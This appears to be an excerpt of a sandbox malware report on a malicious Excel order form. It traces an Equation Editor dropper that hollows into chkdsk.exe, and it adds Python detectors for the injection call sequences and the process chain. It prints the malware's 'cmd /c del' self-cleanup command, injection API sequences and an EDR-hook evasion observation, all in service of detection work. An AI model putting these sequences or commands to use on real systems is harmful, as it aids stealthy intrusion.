Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009B7353
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009FA37B
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009C1489
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009E5485
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A3443E
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009ED47D
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009CC5F0
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009B351F
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009F6540
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009B4680
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009BE6C1
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A52622
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009FA634
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009BC7BC
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A3579A
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009E57C3
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A4F8EE
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009BC85C
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009D286D
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009B29B2
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A5098E
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009C69FE
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A3394B
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A35955
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A63A83
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A5CBA4
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A3DBDA
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009D7B00
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02441238
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0239E2E9
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023A2305
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023EA37B
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023A7353
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023C63DB
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0239F3CF
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_024463BF
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0241D06D
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023CD005
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023B905A
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023A3040
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0239E0C6
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023EA634
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02442622
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023A4680
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023AE6C1
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023AC7BC
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0242579A
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023D57C3
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023DD47D
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0242443E
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023B1489
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023D5485
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023A351F
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023E6540
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_024205E3
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023BC5F0
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02453A83
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023C7B00
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02426BCB
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0242DBDA
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0244CBA4
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023C286D
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023AC85C
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0241F8C4
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0243F8EE
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0242394B
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02425955
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023A29B2
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023B69FE
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0244098E
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023D2E2F
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023BEE4C
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023B0F3F
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023CDF7C
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0242BF14
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02412FDC
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0243CFB1
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0242AC5E
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023D0D3B
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023ACD5B
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0243FDDD
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0009927B
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_00099280
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AE73A
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AD8FD
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AE99C
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000ADAD0
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0009DC20
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_00092D88
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_00092D90
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AEDF4
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000ADEEC
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_00092FB0
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: String function: 0239E2A8 appears 58 times
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: String function: 0240F970 appears 84 times
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: String function: 023E3F92 appears 132 times
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: String function: 023E373B appears 248 times
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: String function: 0239DF5C appears 124 times
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: String function: 009F373B appears 186 times
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: String function: 009ADF5C appears 94 times
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: String function: 00F24599 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: String function: 00F22400 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: String function: 009AE2A8 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: String function: 009F3F92 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: String function: 00A1F970 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041A310 NtCreateFile
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041A3C0 NtReadFile
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041A440 NtClose
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041A4F0 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041A30A NtCreateFile
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041A43A NtClose
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041A4EA NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A00C4 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A0048 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A0078 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A07AC NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099F9F0 NtClose,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099F900 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FAE8 NtQueryInformationProcess,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FBB8 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FB68 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FC90 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FC60 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FD8C NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FDC0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FEA0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FFB4 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A10D0 NtOpenProcessToken
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A0060 NtQuerySection
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A01D4 NtSetValueKey
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A010C NtOpenDirectoryObject
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A1148 NtOpenThread
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099F8CC NtWaitForSingleObject
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099F938 NtWriteFile
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009A1930 NtSetContextThread
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FAB8 NtQueryValueKey
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FA20 NtQueryInformationFile
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FA50 NtEnumerateValueKey
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FBE8 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0099FB50 NtCreateKey
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023900C4 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023907AC NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FAB8 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FB50 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FBB8 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238F900 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238F9F0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FFB4 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FC60 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FD8C NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02390078 NtResumeThread
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02390060 NtQuerySection
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02390048 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023910D0 NtOpenProcessToken
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0239010C NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02391148 NtOpenThread
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_023901D4 NtSetValueKey
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FA20 NtQueryInformationFile
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FA50 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FBE8 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238F8CC NtWaitForSingleObject
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238F938 NtWriteFile
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02391930 NtSetContextThread
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FE24 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FEA0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FF34 NtQueueApcThread
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FFFC NtCreateProcessEx
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FC30 NtOpenProcess
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FC48 NtSetInformationFile
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02390C40 NtGetContextThread
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FC90 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_0238FD5C NtEnumerateKey
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_02391D80 NtSuspendThread
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AA310 NtCreateFile
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AA3C0 NtReadFile
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AA440 NtClose
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AA4F0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AA30A NtCreateFile
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AA43A NtClose
Source: C:\Windows\SysWOW64\chkdsk.exe; Code function: 8_2_000AA4EA NtAllocateVirtualMemory
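The Nt* stubs listed above are the primitives behind the report's "process hollowing", "maps a DLL or memory area into another process" and "queues an APC in another process" signatures: NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, NtSetContextThread and NtResumeThread in bmexo.exe (process 6), and additionally NtOpenProcess, NtCreateProcessEx, NtWriteVirtualMemory and NtQueueApcThread in chkdsk.exe (process 8). The report records which stubs were resolved, not the order in which they were called. The block below is an added example, not part of the Joe Sandbox report, showing how a per-process API trace can be reduced to those techniques by ordered-subsequence matching. The (pid, api) trace format and SAMPLE_TRACE are constructed for illustration from the report's function lists; the pattern tables are the textbook sequences and remain a heuristic. One caveat that the page itself supports: the process 6 stubs sit at 0x0099Fxxx, inside the 0x00990000 region whose dump carries the wntdll.pdb string, and the process 8 stubs at 0x0238Fxxx inside the 0x02380000 region carrying the same string, which is consistent with a second, privately mapped copy of ntdll rather than the loaded one. Inline hooks that a user-mode EDR places in the real ntdll would not see calls through such a copy, so an API trace that depends on those hooks may simply be empty for this sample.

```python
"""Reduce a per-process Nt* API trace to injection techniques by ordered matching.

Added example; it is not part of the Joe Sandbox report. The (pid, api) trace
format and SAMPLE_TRACE are constructed for illustration from the function
names the report resolved in bmexo.exe (pid 6) and chkdsk.exe (pid 8).
"""
from collections import defaultdict

# Ordered call sequences that characterise each technique. Unrelated calls may
# sit between the steps; only relative order matters. Heuristic, not proof.
PATTERNS = {
    "process_hollowing": [
        "NtCreateProcessEx",        # new (suspended) host process
        "NtUnmapViewOfSection",     # evict the host's original image
        "NtAllocateVirtualMemory",  # room for the replacement PE
        "NtWriteVirtualMemory",     # copy it in
        "NtSetContextThread",       # point the main thread at the new entry
        "NtResumeThread",
    ],
    "apc_injection": [
        "NtOpenProcess",
        "NtAllocateVirtualMemory",
        "NtWriteVirtualMemory",
        "NtQueueApcThread",         # payload runs on a thread of the target
    ],
    "section_mapping": [
        "NtCreateSection",
        "NtMapViewOfSection",       # one section mapped into both processes
        "NtSetContextThread",
        "NtResumeThread",
    ],
}


def is_ordered_subsequence(needle, haystack):
    """True when every step of needle occurs in haystack in that order."""
    it = iter(haystack)
    return all(step in it for step in needle)   # 'in' consumes the iterator


def classify(trace):
    """trace: iterable of (pid, api_name) in call order -> {pid: [technique, ...]}."""
    calls_by_pid = defaultdict(list)
    for pid, api in trace:
        calls_by_pid[pid].append(api)
    findings = {}
    for pid, calls in calls_by_pid.items():
        hits = [name for name, seq in PATTERNS.items()
                if is_ordered_subsequence(seq, calls)]
        if hits:
            findings[pid] = hits
    return findings


# Constructed trace: pid 4 is the dropper stage with only file I/O, pid 6 the
# second bmexo.exe instance, pid 8 the chkdsk.exe host. Call order is assumed.
SAMPLE_TRACE = [
    (4, "NtCreateFile"), (4, "NtReadFile"), (4, "NtClose"),
    (6, "NtCreateFile"), (6, "NtReadFile"), (6, "NtCreateSection"),
    (6, "NtMapViewOfSection"), (6, "NtUnmapViewOfSection"),
    (6, "NtSetContextThread"), (6, "NtResumeThread"),
    (8, "NtOpenProcess"), (8, "NtCreateProcessEx"), (8, "NtUnmapViewOfSection"),
    (8, "NtAllocateVirtualMemory"), (8, "NtWriteVirtualMemory"),
    (8, "NtCreateSection"), (8, "NtMapViewOfSection"),
    (8, "NtQueueApcThread"), (8, "NtSetContextThread"), (8, "NtResumeThread"),
]

if __name__ == "__main__":
    for pid, techniques in classify(SAMPLE_TRACE).items():
        print(f"pid {pid}: {', '.join(techniques)}")
```

On the constructed trace pid 4 produces nothing, pid 6 matches only the section-mapping sequence, and pid 8 matches all three. Feeding real data means reading the trace from wherever the hooks live (a sandbox API log, a kernel ETW provider, or a syscall tracer), and the unhooked-ntdll caveat above decides which of those will actually have seen the calls.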
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe; Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe; Memory allocated: 77740000 page execute and read and write
Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsx; Virustotal: Detection: 38%
Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsx; ReversingLabs: Detection: 26%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe; Process created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Process created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe; Process created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Process created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
Source: C:\Windows\SysWOW64\chkdsk.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
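The process chain recorded above is the whole infection in one line of parentage: EQNEDT32.EXE drops and runs C:\Users\Public\vbc.exe, which launches bmexo.exe from the user's Temp directory with a data file (fmrfya) as argument, bmexo.exe re-launches itself, the payload ends up in a chkdsk.exe started by explorer.exe, and that chkdsk.exe runs cmd.exe /c del to remove the dropper. Two details matter for detection. First, EQNEDT32.EXE is COM-activated, so its parent is not EXCEL.EXE (the report attributes it to "unknown"); a rule keyed on Excel spawning the Equation Editor fires on nothing, whereas the Equation Editor spawning any child at all is a reliable signal. Second, explorer.exe launching a SysWOW64 binary is ordinary on its own, so the useful condition is that binary then spawning cmd.exe to delete an executable in a user-writable path. The following is an added example, not part of the Joe Sandbox report, that encodes those three checks over process-creation events. The (pid, ppid, image, cmdline) tuple format and SAMPLE_EVENTS are constructed, with pids chosen to match the report's process numbering.

```python
"""Flag the Equation Editor -> dropper -> hollowed system binary chain in process events.

Added example; it is not part of the Joe Sandbox report. Events are
(pid, ppid, image, cmdline) tuples as a Sysmon/EDR process-creation feed would
supply; SAMPLE_EVENTS is constructed from the chain the report records, with
pids chosen to match the report's process numbering.
"""
import re

EQUATION_EDITOR = "eqnedt32.exe"
# Locations a low-privilege user (and therefore a dropper) can write to.
USER_WRITABLE = re.compile(r"c:\\users\\(public|[^\\]+\\appdata\\local\\temp)\\", re.I)
SYSTEM_DIRS = re.compile(r"c:\\windows\\(system32|syswow64)\\", re.I)
CMD_DEL = re.compile(r"/c\s+del\b", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(events):
    by_pid = {e[0]: e for e in events}
    children = {}
    for pid, ppid, *_ in events:
        children.setdefault(ppid, []).append(pid)
    return by_pid, children


def detect(events):
    """Return (rule, pid, description) alerts in event order."""
    by_pid, children = build_tree(events)
    alerts = []
    for pid, ppid, image, cmdline in events:
        name = basename(image)
        parent = by_pid.get(ppid)
        pname = basename(parent[2]) if parent else None

        # 1. The Equation Editor renders OLE objects; it never needs children.
        #    Its own parent is useless as a key: it is COM-activated, not spawned by Excel.
        if pname == EQUATION_EDITOR:
            alerts.append(("eqnedt32_child", pid, f"{pname} -> {name} {cmdline}"))

        # 2. A binary in a user-writable path re-launching itself (unpacker stage).
        if pname == name and USER_WRITABLE.match(image):
            alerts.append(("self_respawn", pid, f"{image} -> {image}"))

        # 3. explorer.exe -> system binary -> cmd /c del of a user-temp executable:
        #    a hollowed host cleaning up the dropper it was injected from.
        if pname == "explorer.exe" and SYSTEM_DIRS.match(image):
            for cpid in children.get(pid, []):
                child = by_pid[cpid]
                if (basename(child[2]) == "cmd.exe" and CMD_DEL.search(child[3])
                        and USER_WRITABLE.search(child[3])):
                    alerts.append(("hollowed_host_selfdelete", pid,
                                   f"explorer.exe -> {name} -> cmd.exe {child[3]}"))
    return alerts


SAMPLE_EVENTS = [
    (1, 0, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", "EXCEL.EXE /automation -Embedding"),
    (2, 0, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "EQNEDT32.EXE -Embedding"),
    (4, 2, r"C:\Users\Public\vbc.exe", r'"C:\Users\Public\vbc.exe"'),
    (5, 4, r"C:\Users\user\AppData\Local\Temp\bmexo.exe",
     r"C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya"),
    (6, 5, r"C:\Users\user\AppData\Local\Temp\bmexo.exe",
     r"C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya"),
    (7, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    (8, 7, r"C:\Windows\SysWOW64\chkdsk.exe", r"C:\Windows\SysWOW64\chkdsk.exe"),
    (9, 8, r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"'),
]

if __name__ == "__main__":
    for rule, pid, desc in detect(SAMPLE_EVENTS):
        print(f"[{rule}] pid {pid}: {desc}")
```

Rule 1 alone catches this sample at the vbc.exe launch, before any payload runs; rules 2 and 3 are there for the cases where the initial vector is something other than the Equation Editor and the dropper-to-hollowed-host pattern is all that is left to see.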
Source: C:\Users\Public\vbc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
